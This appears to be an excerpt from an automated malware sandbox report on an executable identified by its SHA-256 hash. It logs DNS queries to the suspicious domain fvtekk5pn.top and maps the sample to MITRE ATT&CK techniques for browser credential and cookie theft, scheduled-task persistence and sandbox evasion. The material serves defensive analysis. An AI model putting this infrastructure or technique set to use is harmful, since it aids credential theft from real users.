8.8.8.8:53

76.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

76.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

104.219.191.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

104.219.191.52.in-addr.arpa
8.8.8.8:53

fvtekk5pn.top

dns

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

164 B
216 B
2
2

DNS Request

fvtekk5pn.top

DNS Request

fvtekk5pn.top

DNS Response

34.116.198.130
8.8.8.8:53

fvtekk5pn.top

dns

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

164 B
216 B
2
2

DNS Request

fvtekk5pn.top

DNS Request

fvtekk5pn.top

DNS Response

34.116.198.130
8.8.8.8:53

www.google.com

dns

chrome.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

172.217.16.228
8.8.8.8:53

42.169.217.172.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

42.169.217.172.in-addr.arpa
8.8.8.8:53

35.200.250.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

35.200.250.142.in-addr.arpa
8.8.8.8:53

228.16.217.172.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

228.16.217.172.in-addr.arpa
172.217.16.228:443

www.google.com

https

chrome.exe

2.5kB
10.8kB
12
13
127.0.0.1:55060

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe
8.8.8.8:53

fvtekk5pn.top

dns

6e71349ff091fa402e51aad05f77f65ee2eea8ec824e5b34f5284b7f11eba1f2.exe

164 B
216 B
2
2

DNS Request

fvtekk5pn.top

DNS Request

fvtekk5pn.top

DNS Response

34.116.198.130
8.8.8.8:53

53.210.109.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

53.210.109.20.in-addr.arpa
8.8.8.8:53

241.42.69.40.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

241.42.69.40.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

97.164.16.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

97.164.16.2.in-addr.arpa
8.8.8.8:53

43.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

43.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Authentication Process

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion